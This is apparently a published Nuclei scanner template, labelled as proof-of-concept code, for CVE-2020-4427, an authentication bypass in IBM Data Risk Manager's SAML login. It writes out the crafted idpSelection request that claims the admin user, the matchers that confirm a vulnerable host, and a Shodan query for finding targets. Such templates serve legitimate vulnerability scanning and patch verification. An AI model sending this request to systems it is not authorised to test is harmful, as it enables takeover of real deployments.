IBM Data Risk Manager versions 2.0.1 through 2.0.6 are vulnerable to authentication bypass when configured with SAML authentication. A remote attacker can bypass security restrictions by sending a specially crafted HTTP request to the SAML idpSelection endpoint, allowing them to bypass the authentication process and gain full administrative access to the system.
PoC代码[已公开]
id: CVE-2020-4427
info:
name: IBM Data Risk Manager - Authentication Bypass via SAML
author: ritikchaddha
severity: critical
description: |
IBM Data Risk Manager versions 2.0.1 through 2.0.6 are vulnerable to authentication bypass when configured with SAML authentication. A remote attacker can bypass security restrictions by sending a specially crafted HTTP request to the SAML idpSelection endpoint, allowing them to bypass the authentication process and gain full administrative access to the system.
reference:
- https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/ibm_drm_rce.rb
- https://seclists.org/fulldisclosure/2020/Apr/33
- https://www.ibm.com/support/pages/node/6206875
- https://nvd.nist.gov/vuln/detail/CVE-2020-4427
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-4427
cwe-id: CWE-287
epss-score: 0.91829
epss-percentile: 0.99668
cpe: cpe:2.3:a:ibm:data_risk_manager:*:*:*:*:*:*:*:*
metadata:
verified: false
max-request: 1
vendor: ibm
product: data_risk_manager
shodan-query: title:"IBM Data Risk Manager"
tags: cve,cve2020,ibm,saml,auth-bypass,kev,vkev,vuln
http:
- method: GET
path:
- "{{BaseURL}}/albatross/saml/idpSelection?id={{randstr}}&userName=admin"
matchers-condition: and
matchers:
- type: word
part: location
words:
- "localhost:8765"
- "saml/idpSelection"
condition: and
- type: status
status:
- 302
extractors:
- type: kval
part: header
kval:
- location
# digest: 4a0a00473045022030f37b331be8201f10e9635cc27a5e4403d0e07d0301b8e2d20b4924924f80e10221008c0747a7430cab64f47d3a573ea931b7f1abe096c2d3666e516cda11f1a21254:922c64590222798bb761d5b6d8e72950